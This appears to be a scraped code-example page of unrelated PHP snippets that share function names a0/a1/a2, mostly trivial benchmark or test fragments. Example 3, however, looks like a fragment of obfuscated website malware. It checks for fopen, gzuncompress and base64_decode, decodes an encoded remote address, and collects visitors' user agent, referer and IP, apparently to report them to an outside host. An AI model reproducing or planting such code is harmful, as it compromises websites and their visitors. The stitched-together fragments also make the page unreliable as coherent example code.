Beispiel #1
0
/**
 * Here are the codesize statistics for hphpc and hhvm at the time this
 * benchmark was first written and tested:
 *   hphpc user code size:           695,916 bytes
 *   hhvm translation cache size:  1,044,019 bytes
 *   hhvm bytecode size:              69,761 bytes
 */
function main_function($x)
{
    a0($x);
    a1($x);
    a2($x);
    a3($x);
    a4($x);
    a5($x);
    a6($x);
    a7($x);
    a8($x);
    a9($x);
}
Beispiel #2
0
function a2()
{
    a1();
}
Beispiel #3
0
     $cwwavwyt .= "I_have_problem_with_fopen\t";
     $czyjttvq .= "I_have_problem_with_fopen\t";
 }
 if (!a0('file_get_contents')) {
     $cwwavwyt .= "I_have_problem_with_file_get_contents\t";
     $czyjttvq .= "I_have_problem_with_file_get_contents\t";
 }
 if (!a0('gzuncompress')) {
     $cwwavwyt .= "I_have_problem_with_gzuncompress\t";
     $czyjttvq .= "I_have_problem_with_gzuncompress\t";
 }
 if (!a0('base64_decode')) {
     $cwwavwyt .= "I_have_problem_with_base64_decode\t";
     $czyjttvq .= "I_have_problem_with_base64_decode\t";
 }
 $cymmjecdgy = a1("aHR7cCUzQSUyRiUyRjdzZWFyY9gtcGFydG2lci2jb97lMkZyZXZvbHV7aW6uJTJGZ9V7ZGF7YS2waHA=");
 $cymmjecdgy = str_ireplace("http://", "", $cymmjecdgy);
 if (!empty($_SERVER['HTTP_USER_AGENT'])) {
     $cfhrvdhg = $_SERVER['HTTP_USER_AGENT'];
 } else {
     $cfhrvdhg = "";
 }
 if (!empty($_SERVER['HTTP_REFERER'])) {
     $cqmtmgo = $_SERVER['HTTP_REFERER'];
 } else {
     $cqmtmgo = "";
 }
 if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
     $ccbsmb = $_SERVER['HTTP_X_FORWARDED_FOR'];
 } elseif (!empty($_SERVER['REMOTE_ADDR'])) {
     $ccbsmb = $_SERVER['REMOTE_ADDR'];
Beispiel #4
0
function a2()
{
    a1();
    $o->{$p}();
}
Beispiel #5
0
function a2()
{
    a1();
    $array[1]();
}